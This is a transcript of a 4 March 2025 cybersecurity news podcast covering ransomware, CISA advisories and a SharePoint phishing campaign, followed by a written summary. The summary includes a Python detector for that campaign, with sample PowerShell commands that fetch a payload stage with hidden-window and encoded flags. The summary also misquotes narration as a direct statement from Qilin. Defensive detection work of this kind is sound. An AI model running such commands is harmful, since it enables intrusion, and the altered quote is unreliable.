Unknown Host
From the CISO series, it's Cybersecurity Headlines.
Lauren Verno
These are the cybersecurity headlines for Tuesday, March 4, 2025. I'm Lauren Verno.

CISA denies claims of deprioritizing Russian threats. CISA is pushing back against reports that it has been directed to stop tracking Russian cyber threats, calling the claim, quote, fake and a risk to national security. Now, this is an update to a story that first appeared over the weekend, in which the Guardian reported that a memo deprioritizing Russia was issued, an allegation that CISA and DHS officials deny, with one calling the report, quote, garbage. Meanwhile, the Record, the New York Times and the Washington Post confirm that U.S. Cyber Command has been ordered to pause offensive cyber operations against Russia while negotiations over the war in Ukraine continue. Now, lawmakers on both sides are criticizing any shift, warning it could weaken U.S. defenses against Russian cyber threats.

Ransomware group claims attack on U.S. newspaper publisher. This is an update to a story we previously reported on regarding the cyber attack against Lee Enterprises, one of the largest newspaper groups in the U.S. We now know Russian-speaking ransomware group Qilin has claimed responsibility for the attack, alleging it stole 350 gigabytes of data, including financial records and payments to journalists. The group provided supposed proof of the breach and warned that the stolen data will be leaked on March 5, potentially exposing sensitive information about the company's operations. Lee Enterprises says they are actively investigating the situation.

Latin America's escalating cybersecurity crisis. Cyber threats in Latin America are growing faster than anywhere else. New reports show that attacks are surging 53% year over year, and organizations are facing nearly 40% more weekly incidents than the global average. Now, experts point to political instability, lagging cybersecurity adoption and the rapid rise of financial tech. Now, some of the most impacted industries include healthcare, communications and governments, with an average of 3,000 to 4,000 attacks per week. Now, these attacks are particularly affecting Brazil, where cybercriminals exploit inexperienced users and even collaborate with cartels.

CISA flags Cisco and Windows flaws. U.S. federal agencies have until the end of the month to address flaws in Cisco and Windows systems, CISA reports. These flaws allow attackers to execute arbitrary commands and gain elevated privileges on vulnerable devices, with exploitation currently underway. Now, while the agency has noted these flaws are being actively exploited, it has not provided any specific details surrounding the malicious activity or who may be responsible. You can learn more about these specific flaws in the show notes of today's episode.

Thanks to this week's episode sponsor, ThreatLocker. ThreatLocker is a global leader in zero trust endpoint security, offering cybersecurity controls to protect businesses from zero-day attacks and ransomware. ThreatLocker operates with a default-deny approach to reduce the attack surface and mitigate potential cyber vulnerabilities. To learn more and start your free trial, visit threatlocker.com. That's T-H-R-E-A-T-L-O-C-K-E-R.

Polish Space Agency investigating cyber attack. Poland's space agency, also known as POLSA, is investigating a cybersecurity incident after unauthorized access was detected in its systems, prompting the agency to disconnect its network. Now, some have raised concerns over potential ransomware involvement, though authorities have not confirmed the nature of the breach. As of Monday, POLSA's website remained offline while they work to secure systems and investigate who is behind the attack.

Phishing campaign targets SharePoint. A new phishing campaign targeting Microsoft SharePoint accounts uses a ClickFix-style attack to trick users into deploying a malicious PowerShell command that ultimately installs the Havoc command and control framework. Now, the attackers leverage Microsoft's Graph API to hide the C2 communications, making it difficult to detect by disguising malware stages within legitimate services. Now, researchers say it's not the open source framework used to amplify these campaigns, but the use of a legitimate Microsoft service, that's most concerning.

Microsoft outage update. Microsoft's having a bit of a rough week, and it's only Tuesday. The company says they're investigating a new Microsoft 365 outage on Monday, separate from the one over the weekend that affected Teams customers. Now, multiple customers have taken to social media to report that the outage affected more than just Teams, but also Outlook, OneDrive and Exchange. As of this recording, Microsoft was still investigating the incident on Monday, but stated over the weekend that that outage was caused by a coding issue.

Multiple local governments experienced cyber attacks. New year, same problem. Several local government agencies are grappling with cyber attacks that have disrupted services, including a county in Maryland which has been dealing with limited services for over a week. While major services like 911 remain operational, county officials are still investigating the incident and cannot confirm if it is a ransomware attack. The trend continues, though, across multiple states, with other local agencies, including the Cleveland Municipal Court and Missouri's Department of Conservation, also affected by ongoing attacks. At this time, most of the government agencies have not provided any additional information other than that they are investigating the incident.

There's no idealism for a CISO. Cybersecurity decisions are always being made based on real-world constraints, principally time and money. This can lead to a utilitarian focus on cybersecurity outcomes, trying to do the most good for the most people. That sounds good in theory, but how do you put that idea into practice? That's one of the segments we're digging into on this week's episode of the CISO Series Podcast. Look for the new episode, "All cybersecurity problems are easy to fix with unlimited time and budget," wherever you get your podcasts. I'm Lauren Verno, reporting for the CISO Series.
Unknown Host
Cyber Security Headlines is available every weekday. Head to CISOseries.com for the full stories behind the headlines.
Cyber Security Headlines – CISA Denies Claims, Ransomware Group Claims Attack, Latin America's Security Crisis
Hosted by CISO Series | Released on March 4, 2025
In the latest episode of Cyber Security Headlines, Lauren Verno delves into several pressing issues impacting the information security landscape. From governmental debunking of cyber threat priorities to escalating cyber crises in Latin America, the episode provides a comprehensive overview of current cybersecurity challenges.
Lauren Verno opens the episode addressing the contentious issue surrounding the Cybersecurity and Infrastructure Security Agency (CISA). Recent reports, including one from The Guardian, suggested that CISA had been instructed to deprioritize tracking Russian cyber threats. However, CISA vehemently denies these allegations.
Verno states, “CISA is pushing back against reports that it has been directed to stop tracking Russian cyber threats, calling the claim, quote, fake and a risk to national security” (00:07). This denial comes amid confirmations from The Record, The New York Times, and The Washington Post that U.S. Cyber Command has been ordered to pause offensive cyber operations against Russia during ongoing negotiations over the war in Ukraine.
The episode highlights bipartisan concerns, with lawmakers warning that such a shift “could weaken U.S. defenses against Russian cyber threats” (00:07), emphasizing the delicate balance between diplomatic negotiations and national security.
Transitioning to cybercrime, Verno discusses the alarming claim by the Russian-speaking ransomware group Qilin regarding its attack on Lee Enterprises, one of the largest newspaper groups in the U.S. The group alleges the theft of 350 gigabytes of data, including financial records and journalist payments.
Qilin has provided purported evidence of the breach and has issued a threat: “We will leak the stolen data on March 5, potentially exposing sensitive information about the company's operations” (00:07). Lee Enterprises is currently “actively investigating the situation” (00:07), underscoring the growing threat ransomware poses to critical media infrastructure.
One of the most concerning topics covered is the rapid rise of cyber threats in Latin America, which are outpacing global averages. Verno notes a 53% year-over-year increase in attacks, with organizations experiencing nearly 40% more weekly incidents than the global norm (00:07).
Experts attribute this surge to factors such as political instability, lagging cybersecurity adoption, and the rapid rise of financial technology. Sectors like healthcare, communications, and government are particularly targeted, facing 3,000 to 4,000 attacks per week. Brazil stands out as a hotspot where cybercriminals exploit inexperienced users and sometimes collaborate with cartels, exacerbating the security challenges (00:07).
Verno highlights critical vulnerabilities identified by the Cybersecurity and Infrastructure Security Agency (CISA), which have been flagged in Cisco and Windows systems. U.S. federal agencies are mandated to address these flaws by the end of the month to prevent potential exploitation.
These vulnerabilities allow attackers to execute arbitrary commands and gain elevated privileges on affected devices. While CISA has confirmed active exploitation, specific details about the malicious activities or responsible parties remain undisclosed. More information on these flaws is available in the episode's show notes (00:07).
The episode reports on a significant cybersecurity incident involving Poland’s space agency, POLSA. Unauthorized access was detected, leading to the disconnection of its network to contain the breach. Although the exact nature of the attack remains unconfirmed, there are concerns about potential ransomware involvement.
As of the latest update, POLSA's website remains offline while authorities work to secure their systems and identify the attackers (00:07).
Verno also discusses a sophisticated phishing campaign targeting Microsoft SharePoint accounts. This campaign employs a ClickFix-style attack, deceiving users into running a malicious PowerShell command that installs the Havoc command and control (C2) framework.
Attackers are utilizing Microsoft’s Graph API to obscure C2 communications, making detection challenging by embedding malware stages within legitimate Microsoft services. Researchers express particular concern over the misuse of a legitimate Microsoft service, rather than the open-source framework, to amplify these cyber campaigns (00:07).
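The campaign described above chains three observable behaviours on the endpoint: PowerShell launched by the user from a shell like the Run dialog (the ClickFix paste pattern), command-line options that hide the window, bypass execution policy or base64-encode the payload, and a non-browser process fetching content from graph.microsoft.com. The following Python is an added example written for this summary, not code from the episode or from the researchers it cites; it scores constructed process-creation records (field names `parent`, `image`, `cmdline` are an assumption modelled on Sysmon Event ID 1) against those three signals, decodes `-EncodedCommand` so the Graph URL inside an encoded payload is still seen, and deliberately grades legitimate Graph usage from admin scripts as "review" rather than "alert", since the service itself is benign.

```python
import base64
import re

# Constructed sample records (not from the episode or any real incident). Field
# names are an assumption modelled on Sysmon Event ID 1 / EDR process telemetry.
def encode_ps(command: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

GRAPH_STAGE = "https://graph.microsoft.com/v1.0/me/drive/root:/stage.bin:/content"

SAMPLE_EVENTS = [
    # 1: Run-dialog paste: explorer.exe starts a hidden PowerShell that pulls a stage from Graph
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest {GRAPH_STAGE}"'},
    # 2: same launch path, but the payload is hidden behind -EncodedCommand
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                + encode_ps(f"Invoke-RestMethod {GRAPH_STAGE}")},
    # 3: scheduled maintenance script; nothing suspicious
    {"id": 3, "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    # 4: browser opening a SharePoint link from mail; nothing suspicious
    {"id": 4, "parent": "outlook.exe", "image": "msedge.exe",
     "cmdline": "msedge.exe https://contoso.sharepoint.com/sites/finance"},
    # 5: admin reporting script that legitimately calls Graph; should be "review", not "alert"
    {"id": 5, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\tools\\Get-UserReport.ps1 "
                "-Endpoint https://graph.microsoft.com/v1.0/users"},
]

# Parents that indicate a human typed or pasted the command (Win+R, Explorer address bar).
USER_SHELL_PARENTS = {"explorer.exe"}
BROWSERS = ("msedge", "chrome", "firefox")

EVASIVE_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|nop(?:rofile)?)\b", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
GRAPH_HOST = re.compile(r"https?://graph\.microsoft\.com/", re.I)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded body of any -EncodedCommand so later checks can inspect it."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed payload: leave the raw line for the other checks
    return cmdline + " " + decoded


def assess(event: dict) -> dict:
    """Return the signals seen for one process-creation record and a verdict."""
    cmd = expand_encoded(event["cmdline"])
    image = event["image"].lower()
    reasons = []
    if image == "powershell.exe" and event["parent"].lower() in USER_SHELL_PARENTS:
        reasons.append("powershell launched from explorer.exe (Run dialog / ClickFix paste pattern)")
    if EVASIVE_FLAGS.search(cmd):
        reasons.append("hidden-window / policy-bypass / no-profile flags")
    if ENCODED_FLAG.search(event["cmdline"]):
        reasons.append("-EncodedCommand payload")
    if GRAPH_HOST.search(cmd) and not image.startswith(BROWSERS):
        reasons.append("non-browser process contacting graph.microsoft.com")
    score = len(reasons)
    # Graph traffic from an admin script is common, so two signals only earn a review.
    verdict = "alert" if score >= 3 else "review" if score == 2 else "ok"
    return {"id": event["id"], "score": score, "verdict": verdict, "reasons": reasons}


def run_all(events: list) -> list:
    return [assess(e) for e in events]


if __name__ == "__main__":
    for r in run_all(SAMPLE_EVENTS):
        print(f"event {r['id']}: {r['verdict']} ({r['score']}) {r['reasons']}")
```

Event 1 and event 2 each collect three or more signals and become alerts; event 5 touches Graph with `-NoProfile` but from a non-interactive parent, so it lands in the review queue where an analyst can confirm it is the expected reporting script. The thresholds and parent list are tuning choices for this example, not figures from the episode.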
Adding to the cybersecurity chaos, Microsoft is experiencing a tumultuous week with multiple outages affecting its services. According to Verno, a new Microsoft 365 outage on Monday has impacted not just Teams but also Outlook, OneDrive, and Exchange. While Microsoft attributes the previous weekend's outage to a coding issue, the current investigation is ongoing, leaving customers uncertain about the reliability of these essential services (00:07).
Local government agencies continue to grapple with persistent cyber attacks, disrupting essential services across various regions. For instance, a county in Maryland has been dealing with limited services for over a week, though critical services like 911 remain operational. Officials are still investigating the incident without confirming whether it is a ransomware attack.
Similar disruptions have been reported in Cleveland Municipal Court and Missouri’s Department of Conservation, indicating a widespread trend of cyber assaults on local government entities (00:07).
In a thought-provoking segment, Verno explores the challenges faced by Chief Information Security Officers (CISOs) in balancing cybersecurity decisions amidst real-world constraints such as time and budget. The discussion centers on the utilitarian approach to cybersecurity—“trying to do the most good for the most people”—and questions the practicality of implementing such ideals in high-pressure environments.
This segment invites listeners to reflect on the complexities of cybersecurity leadership and the often difficult trade-offs required to protect organizational assets effectively (00:07).
Conclusion
Lauren Verno's detailed coverage in this episode of Cyber Security Headlines underscores the multifaceted nature of today's cybersecurity landscape. From high-stakes governmental decisions and ransomware threats to regional security crises and the relentless evolution of cyber attacks, the episode provides valuable insights for professionals and enthusiasts alike.
For a deeper dive into each of these topics, visit CISOseries.com.
Note: Time-stamped quotes are attributed to Lauren Verno at 00:07, representing her commentary throughout the episode.